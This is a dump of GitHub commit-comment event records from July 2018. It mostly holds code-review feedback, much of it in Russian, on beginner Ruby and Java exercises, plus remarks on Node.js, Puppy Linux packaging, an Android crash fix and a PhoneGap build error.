{"id":"8034197877","type":"CommitCommentEvent","actor":{"login":"devsnek"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29874999,"position":24,"line":56,"path":"lib/internal/fs/utils.js","commit_id":"57b432c0549dbfe845747dcfe3ac485305de7779","created_at":"2018-07-29T15:51:42Z","updated_at":"2018-07-29T15:51:42Z","author_association":"MEMBER","body":"why not make type a well known string so we can get rid of those functions"}},"created_at":"2018-07-29T15:51:42Z"}
{"id":"8034198992","type":"CommitCommentEvent","actor":{"login":"woodenshoe-wi"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":29875002,"position":null,"line":null,"path":null,"commit_id":"f561d941956c56be4fb3aa6ccd15a2e7706a439f","created_at":"2018-07-29T15:52:22Z","updated_at":"2018-07-29T15:52:22Z","author_association":"CONTRIBUTOR","body":"> shouldn't pmusic_PLUGIN_tray versions be in common32 and common64 ?\r\n\r\nAt this point everything in common32 and common64 has a petbuild.\r\n\r\nI don't know if pmusic_PLUGIN_tray will compile in common32/64 because I really cut down on the number of libraries included in common32/64, but I would be willing to try if I could find the petbuild...\r\n\r\nMaybe there is no petbuild, so I also looked for the source code in \r\nhttp://distro.ibiblio.org/puppylinux/sources/p/\r\n\r\nNothing...  the power of open source depends on being able to find the source code..."}},"created_at":"2018-07-29T15:52:22Z"}
{"id":"8034199369","type":"CommitCommentEvent","actor":{"login":"mq1n"},"repo":{"name":"LordNoteworthy/al-khaser"},"payload":{"comment":{"id":29875003,"position":null,"line":null,"path":null,"commit_id":"6dd82dbcce8604bfb94b89361da464e0eaa75aa3","created_at":"2018-07-29T15:52:37Z","updated_at":"2018-07-29T15:52:37Z","author_association":"NONE","body":"You can use LdrEnumerateLoadedModules API instead of tons LDR work."}},"created_at":"2018-07-29T15:52:37Z"}
{"id":"8034201216","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29875014,"position":14,"line":14,"path":"2/first.rb","commit_id":"c11f7c37f3e9417c2e5b9cfbcc23dfa078d69981","created_at":"2018-07-29T15:54:01Z","updated_at":"2018-07-29T15:54:01Z","author_association":"NONE","body":"Лучше использовать новый синтаксис хэшей. Он экономичней по памяти, его легче читать и меньше символов занимает (но последний пункт далеко не всегда преймущество)\r\n```\r\nmonth = {\r\n  January: 31,\r\n  ...\r\n}\r\n```"}},"created_at":"2018-07-29T15:54:01Z"}
{"id":"8034202889","type":"CommitCommentEvent","actor":{"login":"ramybenaroya"},"repo":{"name":"ramybenaroya/pickpick"},"payload":{"comment":{"id":29875016,"position":null,"line":null,"path":null,"commit_id":"77941f7680d27ef1de64def91a57f3aa07ef223c","created_at":"2018-07-29T15:55:08Z","updated_at":"2018-07-29T15:55:08Z","author_association":"OWNER","body":"@kessler oh, I was just looking for a simple first contribution. Sure, a chat will be nice over a balcony cigarette."}},"created_at":"2018-07-29T15:55:08Z"}
{"id":"8034203921","type":"CommitCommentEvent","actor":{"login":"lordmauve"},"repo":{"name":"py-zero/cryptozero"},"payload":{"comment":{"id":29875021,"position":12,"line":35,"path":"README.md","commit_id":"59a016d84be487003447703d9d06e640d64382b0","created_at":"2018-07-29T15:55:51Z","updated_at":"2018-07-29T15:55:51Z","author_association":"NONE","body":"I'm not sure beginners will know what base64 is. Also the length relationship between input and output is a bit complicated. I think \r\n\r\n```\r\nstretch('passw0rd').hex()\r\n```\r\n\r\nmight be better (even if the output is longer)."}},"created_at":"2018-07-29T15:55:51Z"}
{"id":"8034205295","type":"CommitCommentEvent","actor":{"login":"lordmauve"},"repo":{"name":"py-zero/cryptozero"},"payload":{"comment":{"id":29875023,"position":37,"line":60,"path":"README.md","commit_id":"59a016d84be487003447703d9d06e640d64382b0","created_at":"2018-07-29T15:56:46Z","updated_at":"2018-07-29T15:56:46Z","author_association":"NONE","body":"Maybe use `secrets.token_bytes()`?"}},"created_at":"2018-07-29T15:56:46Z"}
{"id":"8034205665","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29875026,"position":5,"line":6,"path":"Lesson_2/numbers_fibonachi.rb","commit_id":"842bab95e83f76f5541e845b084d5ef926ee2b17","created_at":"2018-07-29T15:57:00Z","updated_at":"2018-07-29T15:57:00Z","author_association":"NONE","body":"чтобы взять последний и предпоследние элементы можно использовать индексы `- 1` и `- 2`, тогда не нужно считать индекс\r\n\r\nвот так:\r\n```ruby\r\nelement = fibbonacci[-1] + fibbonacci[-2]\r\n```"}},"created_at":"2018-07-29T15:57:00Z"}
{"id":"8034206113","type":"CommitCommentEvent","actor":{"login":"tophertimzen"},"repo":{"name":"BSidesPDX/bsidespdx.org"},"payload":{"comment":{"id":29875027,"position":null,"line":null,"path":null,"commit_id":"d5108e64f4f62ed5ea24549ca2447af163c1c0ef","created_at":"2018-07-29T15:57:18Z","updated_at":"2018-07-29T15:57:18Z","author_association":"MEMBER","body":"Fixed in https://github.com/BSidesPDX/bsidespdx.org/commit/bea31391a20a887ac89fd5383250310516f9d5ae"}},"created_at":"2018-07-29T15:57:18Z"}
{"id":"8034206603","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29875028,"position":1,"line":3,"path":"Lesson_2/numbers_fibonachi.rb","commit_id":"842bab95e83f76f5541e845b084d5ef926ee2b17","created_at":"2018-07-29T15:57:36Z","updated_at":"2018-07-29T15:57:36Z","author_association":"NONE","body":"кажется уже писал, повторюсь\r\nмассивы в руби рекомендуют записывать, разделяя элементы пробелом:\r\n```ruby\r\narr = [1, 2, 3] # good\r\n\r\narr = [1,2,3] # bad\r\n```"}},"created_at":"2018-07-29T15:57:36Z"}
{"id":"8034206767","type":"CommitCommentEvent","actor":{"login":"peabee"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":29875029,"position":null,"line":null,"path":null,"commit_id":"f561d941956c56be4fb3aa6ccd15a2e7706a439f","created_at":"2018-07-29T15:57:43Z","updated_at":"2018-07-29T15:57:43Z","author_association":"CONTRIBUTOR","body":"or should be added to rootfs-packages to live alongside pmusic - there are already items with both a 32-bit and 64-bit version so precedent has been set...."}},"created_at":"2018-07-29T15:57:43Z"}
{"id":"8034208314","type":"CommitCommentEvent","actor":{"login":"alanionita"},"repo":{"name":"udacity/ud845-Pets"},"payload":{"comment":{"id":29875035,"position":49,"line":122,"path":"app/src/main/java/com/example/android/pets/EditorActivity.java","commit_id":"bea7d9080f06d447892c634f6271cb83eef9762b","created_at":"2018-07-29T15:58:48Z","updated_at":"2018-07-29T15:58:48Z","author_association":"NONE","body":"In my case my app (running in emulator) is failing on that line with \r\n\r\n```\r\n// check if view has been touched\r\njava.lang.RuntimeException: Unable to start activity ComponentInfo{com.example.android.pets/com.example.android.pets.EditorActivity}: java.lang.NullPointerException: Attempt to invoke virtual method 'void android.widget.EditText.setOnTouchListener(android.view.View$OnTouchListener)' on a null object reference\r\n```"}},"created_at":"2018-07-29T15:58:48Z"}
{"id":"8034209158","type":"CommitCommentEvent","actor":{"login":"lordmauve"},"repo":{"name":"py-zero/cryptozero"},"payload":{"comment":{"id":29875040,"position":10,"line":33,"path":"README.md","commit_id":"59a016d84be487003447703d9d06e640d64382b0","created_at":"2018-07-29T15:59:23Z","updated_at":"2018-07-29T15:59:23Z","author_association":"NONE","body":"I'd suggest we make everything importable directly from `cryptozero` for simplicity (even if we split it up for maintainability)."}},"created_at":"2018-07-29T15:59:23Z"}
{"id":"8034209996","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/learning-css"},"payload":{"comment":{"id":29875041,"position":null,"line":null,"path":null,"commit_id":"4418542af6242d6503c003c0977af22f55b366f5","created_at":"2018-07-29T15:59:56Z","updated_at":"2018-07-29T15:59:56Z","author_association":"OWNER","body":"CSS Deep Dive Summary: [css-03-deep-dive-summary.pdf](https://github.com/whyang0808/learning-css/files/2238928/css-03-deep-dive-summary.pdf)\r\n"}},"created_at":"2018-07-29T15:59:56Z"}
{"id":"8034211643","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29875048,"position":null,"line":null,"path":null,"commit_id":"3342f717da7f660b4695f09034abc175a14fda24","created_at":"2018-07-29T16:00:49Z","updated_at":"2018-07-29T16:00:49Z","author_association":"MEMBER","body":"AFAIK it doesn't only affect `nix-env -i` usage.  It's used also by `buildEnv`, including `systemPackages`.  I believe especially `.dev` outputs don't belong to `nix-env -i` by default.  Back then when this was created, the main rationale for splitting a package was that the package contained too much by default. People seem often mislead that `nix-env` is good for build environments, but `nix-shell` is a much better fit for that, because it set various other things needed for building.\r\n\r\nThere's this thread https://github.com/NixOS/nixpkgs/issues/24717 and perhaps others.  I had planned to make it configurable in nixpkgs in the usual way, so that people could do the equivalents of e.g. `programs.man.enable` for `systemPackages`, but IIRC I hit some obstacles with affecting `buildEnv` usage in nixpkgs sources, and I didn't manage to finish the work."}},"created_at":"2018-07-29T16:00:49Z"}
{"id":"8034214011","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29875051,"position":3,"line":5,"path":"Lesson_2/numbers_fibonachi.rb","commit_id":"842bab95e83f76f5541e845b084d5ef926ee2b17","created_at":"2018-07-29T16:02:24Z","updated_at":"2018-07-29T16:02:24Z","author_association":"NONE","body":"текущий вариант работает верно, но не очень рекомендуемый\r\nон довольно сложный в прочтении, точнее - неочевидный\r\nвообще варианты с \"брейк\" они не очень рекомендуются к использованию, ввиду их неочевидности\r\nкогда я читаю код `for i in 2..100`, у меня в голове уже строится модель кода, который будет перебирать все элементы от 2 до 100... а потом вдруг \"брейк\"\r\nдля подобных случаев рекомендуется использовать конструкцию `while sum < 100` - здесь в первой же строчке обозначено, до выполнения какого условия будет работать петля\r\nпопробуй переписать через \"вайл\""}},"created_at":"2018-07-29T16:02:24Z"}
{"id":"8034215474","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29875060,"position":8,"line":8,"path":"2/fourth.rb","commit_id":"c11f7c37f3e9417c2e5b9cfbcc23dfa078d69981","created_at":"2018-07-29T16:03:20Z","updated_at":"2018-07-29T16:03:20Z","author_association":"NONE","body":":2$ ruby fourth.rb\r\n{\"a\"=>0, \"e\"=>4, \"i\"=>8, \"o\"=>14, \"u\"=>20}\r\n\r\nОк, он не выполняет тз. Но тут код написан для машины, а не для человека, который будет его поддерживать. Слишком сложное решение, для простой задачи. Когда тебе через месяц нужно будет расширить этот модуль, то ты будешь его читать пару минут, вместо того, что-б понять, что тут происходит с первого взгляда. Нужно просто \"тупо\" взять массив с буквами и взять массив (или строку) с гласными и пробежать по массиву с помощью each_with_index и проверить, если текущий элемент включен в массив (строку) гласных.  Если включен - то записать его в хэш с index + 1. Научиться писать простой код - это целое искусство. Вот поделюсь статьей на эту тему\r\n\r\nhttps://habr.com/post/347166/"}},"created_at":"2018-07-29T16:03:20Z"}
{"id":"8034216198","type":"CommitCommentEvent","actor":{"login":"peabee"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":29875061,"position":null,"line":null,"path":null,"commit_id":"f561d941956c56be4fb3aa6ccd15a2e7706a439f","created_at":"2018-07-29T16:03:51Z","updated_at":"2018-07-29T16:03:51Z","author_association":"CONTRIBUTOR","body":"Sources here?\r\nhttp://murga-linux.com/puppy/viewtopic.php?p=663131\r\nI'll copy them to ibiblio...."}},"created_at":"2018-07-29T16:03:51Z"}
{"id":"8034220726","type":"CommitCommentEvent","actor":{"login":"dgilman"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29875070,"position":10,"line":10,"path":"sysutils/f3/Portfile","commit_id":"0fc76cb3454cd185b6a0fadec191aa77bf65fc12","created_at":"2018-07-29T16:06:54Z","updated_at":"2018-07-29T16:06:54Z","author_association":"CONTRIBUTOR","body":"Can someone also please update section 7.3.3 substep 3 where it describes the formatting of the maintainers line? https://guide.macports.org/chunked/project.contributing.html I read that over when contributing this patch as I was trying to find documentation on the syntax of the maintainers line. The documentation linked there doesn't describe the `{foo @foo}` syntax so I figured it was out of date, pre-github documentation and copied what everyone else was doing."}},"created_at":"2018-07-29T16:06:54Z"}
{"id":"8034222199","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875074,"position":1,"line":1,"path":"L5_222.java","commit_id":"6f2d128704197652f04844ab77e2b5e9d7ab4beb","created_at":"2018-07-29T16:07:57Z","updated_at":"2018-07-29T16:07:57Z","author_association":"NONE","body":"название пакетов с маленькой буквы, читать код конвеншен"}},"created_at":"2018-07-29T16:07:57Z"}
{"id":"8034222765","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875079,"position":1,"line":1,"path":"L5_222.java","commit_id":"6f2d128704197652f04844ab77e2b5e9d7ab4beb","created_at":"2018-07-29T16:08:21Z","updated_at":"2018-07-29T16:08:21Z","author_association":"NONE","body":"Названия коммитов должны отражать суть того, что ты комитаешь, а не везде 'Add files via upload'"}},"created_at":"2018-07-29T16:08:21Z"}
{"id":"8034223329","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29875080,"position":46,"line":19,"path":"Lesson_2/sum_buys.rb","commit_id":"7d529a35746c9053364bdc50e66944dfc824049e","created_at":"2018-07-29T16:08:40Z","updated_at":"2018-07-29T16:08:40Z","author_association":"NONE","body":"эта строчка не имеет смысла - уже в следующей ты перезаписываешь значение этой переменной"}},"created_at":"2018-07-29T16:08:40Z"}
{"id":"8034223933","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29875081,"position":null,"line":null,"path":null,"commit_id":"03981bf9c2557219cf9b9c0674f8eeb38e2f00ac","created_at":"2018-07-29T16:09:08Z","updated_at":"2018-07-29T16:09:08Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [042 - Desenvolver Repository - Telefone](https://trello.com/c/Yc62a7Le/48-042-desenvolver-repository-telefone)"}},"created_at":"2018-07-29T16:09:08Z"}
{"id":"8034224268","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875082,"position":3,"line":3,"path":"L5_222.java","commit_id":"6f2d128704197652f04844ab77e2b5e9d7ab4beb","created_at":"2018-07-29T16:09:21Z","updated_at":"2018-07-29T16:09:21Z","author_association":"NONE","body":"код конвеншен ты совсем не читаешь, наверное, CamelCase названия классов, никаких нижних подчеркиваний, и стараться избегать цифр. Давать нормальные имена всему, и классам и функциям и переменным, чтобы они отражали суть того, что ты там хранишь, что делаешь и т.д."}},"created_at":"2018-07-29T16:09:21Z"}
{"id":"8034224805","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875083,"position":63,"line":63,"path":"L5_222.java","commit_id":"6f2d128704197652f04844ab77e2b5e9d7ab4beb","created_at":"2018-07-29T16:09:46Z","updated_at":"2018-07-29T16:09:46Z","author_association":"NONE","body":"код не отформатирован, перед коммитом делай Ctrl + Alt + L"}},"created_at":"2018-07-29T16:09:46Z"}
{"id":"8034225446","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875084,"position":6,"line":6,"path":"L5_222.java","commit_id":"6f2d128704197652f04844ab77e2b5e9d7ab4beb","created_at":"2018-07-29T16:10:15Z","updated_at":"2018-07-29T16:10:15Z","author_association":"NONE","body":"функция должна возвращать число, а не быть void"}},"created_at":"2018-07-29T16:10:15Z"}
{"id":"8034225996","type":"CommitCommentEvent","actor":{"login":"AncarW"},"repo":{"name":"umuccmsc/todo"},"payload":{"comment":{"id":29875086,"position":null,"line":null,"path":null,"commit_id":"ecbeb0a344e8c60aac7f743e6987d24affea49f1","created_at":"2018-07-29T16:10:36Z","updated_at":"2018-07-29T16:10:36Z","author_association":"COLLABORATOR","body":"test"}},"created_at":"2018-07-29T16:10:36Z"}
{"id":"8034226270","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875088,"position":6,"line":6,"path":"L5_222.java","commit_id":"6f2d128704197652f04844ab77e2b5e9d7ab4beb","created_at":"2018-07-29T16:10:48Z","updated_at":"2018-07-29T16:10:48Z","author_association":"NONE","body":"Используй импорты, а не java.lang.String. Просто String и импорт вверху, это делается в идее с помощью ctrl + пробел"}},"created_at":"2018-07-29T16:10:48Z"}
{"id":"8034227091","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875095,"position":19,"line":19,"path":"L5_222.java","commit_id":"6f2d128704197652f04844ab77e2b5e9d7ab4beb","created_at":"2018-07-29T16:11:23Z","updated_at":"2018-07-29T16:11:23Z","author_association":"NONE","body":"не надо делать отступов между break и кейсами"}},"created_at":"2018-07-29T16:11:23Z"}
{"id":"8034227798","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875097,"position":48,"line":48,"path":"L5_222.java","commit_id":"6f2d128704197652f04844ab77e2b5e9d7ab4beb","created_at":"2018-07-29T16:11:53Z","updated_at":"2018-07-29T16:11:53Z","author_association":"NONE","body":"инструкция default должна быть в break в ней, все написано в код конвеншене"}},"created_at":"2018-07-29T16:11:53Z"}
{"id":"8034228625","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29875101,"position":45,"line":18,"path":"Lesson_2/sum_buys.rb","commit_id":"7d529a35746c9053364bdc50e66944dfc824049e","created_at":"2018-07-29T16:12:25Z","updated_at":"2018-07-29T16:12:25Z","author_association":"NONE","body":"после запятой желателен пробел \r\nлучше давать более осмысленные имена переменым даже при итерациях по коллекциям\r\nздесь можно было назвать `product`, `details` или `item`, `data`... как-то в таком ключе"}},"created_at":"2018-07-29T16:12:25Z"}
{"id":"8034230281","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875109,"position":8,"line":8,"path":"L4_1.java","commit_id":"b8a7bc77e85282f1ec0fabc46f3c51f8e2677f54","created_at":"2018-07-29T16:13:33Z","updated_at":"2018-07-29T16:13:33Z","author_association":"NONE","body":"давать нормальные названия переменным, а не k, n, mas, mas1"}},"created_at":"2018-07-29T16:13:33Z"}
{"id":"8034230833","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875111,"position":12,"line":12,"path":"L4_1.java","commit_id":"b8a7bc77e85282f1ec0fabc46f3c51f8e2677f54","created_at":"2018-07-29T16:13:55Z","updated_at":"2018-07-29T16:13:55Z","author_association":"NONE","body":"если тебе нужен int, то почему не используешь класс Random?"}},"created_at":"2018-07-29T16:13:55Z"}
{"id":"8034231563","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875113,"position":23,"line":23,"path":"L4_1.java","commit_id":"b8a7bc77e85282f1ec0fabc46f3c51f8e2677f54","created_at":"2018-07-29T16:14:23Z","updated_at":"2018-07-29T16:14:23Z","author_association":"NONE","body":"все в функции main - выносить в отдельные функции, в main только тестируем код"}},"created_at":"2018-07-29T16:14:23Z"}
{"id":"8034231709","type":"CommitCommentEvent","actor":{"login":"alanionita"},"repo":{"name":"udacity/ud845-Pets"},"payload":{"comment":{"id":29875114,"position":49,"line":122,"path":"app/src/main/java/com/example/android/pets/EditorActivity.java","commit_id":"bea7d9080f06d447892c634f6271cb83eef9762b","created_at":"2018-07-29T16:14:29Z","updated_at":"2018-07-29T16:14:29Z","author_association":"NONE","body":"@darwinyip \r\n\r\nManaged to fix the issue like this: \r\n\r\n```java\r\n@Override\r\n        public boolean onTouch(View view, MotionEvent motionEvent) {\r\n            viewHasChanged = true;\r\n            // Add this line to override click\r\n            if (motionEvent.getAction() == MotionEvent.ACTION_UP) {\r\n                view.performClick();\r\n            }\r\n            return false;\r\n        }\r\n```\r\n\r\nThe linter warning is still there, but the app is no longer crashing on that line. "}},"created_at":"2018-07-29T16:14:29Z"}
{"id":"8034232189","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29875115,"position":47,"line":20,"path":"Lesson_2/sum_buys.rb","commit_id":"7d529a35746c9053364bdc50e66944dfc824049e","created_at":"2018-07-29T16:14:46Z","updated_at":"2018-07-29T16:14:46Z","author_association":"NONE","body":"здесь же у тебя уже есть значение для этого ключа\r\nты его в 18 строке записываешь в переменную `value`\r\nпоэтому запись может быть проще: `value[:price] + value[:quantity]` (ну или переименуй `value` для лучшей читаемости, но обращаться нужно к этой переменной, а не к `cart`)"}},"created_at":"2018-07-29T16:14:46Z"}
{"id":"8034233019","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875117,"position":21,"line":21,"path":"L4_1.java","commit_id":"b8a7bc77e85282f1ec0fabc46f3c51f8e2677f54","created_at":"2018-07-29T16:15:08Z","updated_at":"2018-07-29T16:15:08Z","author_association":"NONE","body":"очень сложно написано, какой-то коэф-т k, который используется везде, название вообще ни о чем не говорит"}},"created_at":"2018-07-29T16:15:08Z"}
{"id":"8034234022","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875120,"position":30,"line":30,"path":"L4_1.java","commit_id":"b8a7bc77e85282f1ec0fabc46f3c51f8e2677f54","created_at":"2018-07-29T16:15:37Z","updated_at":"2018-07-29T16:15:37Z","author_association":"NONE","body":"код написан безобразно, уже 3 недели повторяю, чтобы форматировали код перед коммитом"}},"created_at":"2018-07-29T16:15:37Z"}
{"id":"8034234183","type":"CommitCommentEvent","actor":{"login":"woodenshoe-wi"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":29875121,"position":null,"line":null,"path":null,"commit_id":"f561d941956c56be4fb3aa6ccd15a2e7706a439f","created_at":"2018-07-29T16:15:42Z","updated_at":"2018-07-29T16:15:42Z","author_association":"CONTRIBUTOR","body":"Ok, I see it is hosted at \r\nhttp://www.01micko.com/\r\n\r\nI see a 64 bit version is already available, were you planning on on just copying the existing pets to common32/64 or would you want me to try to make a petbuild and recompile them?"}},"created_at":"2018-07-29T16:15:42Z"}
{"id":"8034234810","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875122,"position":5,"line":5,"path":"L4_2.java","commit_id":"b8a7bc77e85282f1ec0fabc46f3c51f8e2677f54","created_at":"2018-07-29T16:16:01Z","updated_at":"2018-07-29T16:16:01Z","author_association":"NONE","body":"с названием классов и пакетов то же самое замечание везде"}},"created_at":"2018-07-29T16:16:01Z"}
{"id":"8034234839","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29875123,"position":55,"line":24,"path":"Lesson_2/sum_buys.rb","commit_id":"7d529a35746c9053364bdc50e66944dfc824049e","created_at":"2018-07-29T16:16:02Z","updated_at":"2018-07-29T16:16:02Z","author_association":"NONE","body":"лучше отдельно посчитать, присвоить в переменную , а потом в строке обратиться к переменной\r\nхорошая привычка - отделять логику и рассчеты от аутпута"}},"created_at":"2018-07-29T16:16:02Z"}
{"id":"8034234849","type":"CommitCommentEvent","actor":{"login":"glebmachine"},"repo":{"name":"phonegap/phonegap-plugin-push"},"payload":{"comment":{"id":29875124,"position":null,"line":null,"path":null,"commit_id":"1ecff81a9eac51b56403948d0092e3ab55a72234","created_at":"2018-07-29T16:16:02Z","updated_at":"2018-07-29T16:16:02Z","author_association":"NONE","body":"When choose 2.1.2 version i've got:\r\n\r\n```\r\nLinker command failed with code 1\r\n\r\nld: warning: directory not found for option '-L/Users/xxx/Library/Developer/Xcode/DerivedData/XXX/Build/Products/Debug-iphonesimulator/GoogleToolboxForMac'\r\nld: warning: directory not found for option '-L/Users/xxx/Library/Developer/Xcode/DerivedData/XXX/Build/Products/Debug-iphonesimulator/Protobuf'\r\nld: warning: directory not found for option '-L/Users/xxx/Library/Developer/Xcode/DerivedData/XXX/Build/Products/Debug-iphonesimulator/nanopb'\r\nld: library not found for -lGoogleToolboxForMac\r\nclang: error: linker command failed with exit code 1 (use -v to see invocation)\r\n```"}},"created_at":"2018-07-29T16:16:02Z"}
{"id":"8034236477","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875129,"position":14,"line":14,"path":"L4_2.java","commit_id":"b8a7bc77e85282f1ec0fabc46f3c51f8e2677f54","created_at":"2018-07-29T16:17:07Z","updated_at":"2018-07-29T16:17:07Z","author_association":"NONE","body":"зачем ты сортируешь массив?"}},"created_at":"2018-07-29T16:17:07Z"}
{"id":"8034236920","type":"CommitCommentEvent","actor":{"login":"blueberry"},"repo":{"name":"bbatsov/prelude"},"payload":{"comment":{"id":29875132,"position":null,"line":null,"path":null,"commit_id":"d6786e33f1bd52ff37af9c826be7db0c70c96b42","created_at":"2018-07-29T16:17:25Z","updated_at":"2018-07-29T16:17:25Z","author_association":"NONE","body":"I agree with you, but, again, I think we should respect the preference of the author of the package, especially when *one line makes things work exactly as we like*?"}},"created_at":"2018-07-29T16:17:25Z"}
{"id":"8034237488","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29875133,"position":65,"line":98,"path":"lesson3/station.rb","commit_id":"acbde6214191cb63076362b0c806ca4c9590daf3","created_at":"2018-07-29T16:17:47Z","updated_at":"2018-07-29T16:17:47Z","author_association":"NONE","body":"Вот эта строка не нужна. Зная индекс текущей станции мы всегда можем вычислить ее из массива станций в методе current_station. А запись переменной `@station` - это дупликация данных, что скорее всего приведет к багам в дальнейшем. Хорошо всегда иметь единственный \"источник правды\""}},"created_at":"2018-07-29T16:17:47Z"}
{"id":"8034237911","type":"CommitCommentEvent","actor":{"login":"glebmachine"},"repo":{"name":"phonegap/phonegap-plugin-push"},"payload":{"comment":{"id":29875134,"position":null,"line":null,"path":null,"commit_id":"1ecff81a9eac51b56403948d0092e3ab55a72234","created_at":"2018-07-29T16:18:05Z","updated_at":"2018-07-29T16:18:05Z","author_association":"NONE","body":"Found solution here: https://github.com/google/google-toolbox-for-mac/issues/137#issuecomment-314012109"}},"created_at":"2018-07-29T16:18:05Z"}
{"id":"8034237993","type":"CommitCommentEvent","actor":{"login":"itchka"},"repo":{"name":"OpenMandrivaAssociation/php-memcached"},"payload":{"comment":{"id":29875136,"position":null,"line":null,"path":null,"commit_id":"ce009410b5b76e754b1471d2dd4f0028a11e3e76","created_at":"2018-07-29T16:18:08Z","updated_at":"2018-07-29T16:18:08Z","author_association":"CONTRIBUTOR","body":"Still getting the hang of commiting on the command line rather than using git gui"}},"created_at":"2018-07-29T16:18:08Z"}
{"id":"8034239417","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29875147,"position":26,"line":26,"path":"L4_2.java","commit_id":"b8a7bc77e85282f1ec0fabc46f3c51f8e2677f54","created_at":"2018-07-29T16:19:06Z","updated_at":"2018-07-29T16:19:06Z","author_association":"NONE","body":"написано очень сложно"}},"created_at":"2018-07-29T16:19:06Z"}
{"id":"8034239959","type":"CommitCommentEvent","actor":{"login":"cimoalpacino"},"repo":{"name":"kfazz/Prusa-Firmware"},"payload":{"comment":{"id":29875149,"position":null,"line":null,"path":null,"commit_id":"4ea0630f33a680d61c9fb38e4dd1448981d59468","created_at":"2018-07-29T16:19:29Z","updated_at":"2018-07-29T16:19:29Z","author_association":"NONE","body":"Hi, I'm also trying to port MK3 fw on ramps. Does your communication over uart to pronterface work? I'm trying to port the latest fw 3.3.1 (#974) but they introduced a second serial port (uart2) and even if i disable it, i can't get it to work. The code for rx and tx in 3.3.1 is different from version you are deriving from (i think 3.1.4?). "}},"created_at":"2018-07-29T16:19:29Z"}
{"id":"8034240389","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29875152,"position":71,"line":104,"path":"lesson3/station.rb","commit_id":"acbde6214191cb63076362b0c806ca4c9590daf3","created_at":"2018-07-29T16:19:48Z","updated_at":"2018-07-29T16:19:48Z","author_association":"NONE","body":"Эта проверка не нужна. Если route нет, то метод next_station, который вычисляется из route вернет nil и второе условие не будет удовлетворено"}},"created_at":"2018-07-29T16:19:48Z"}
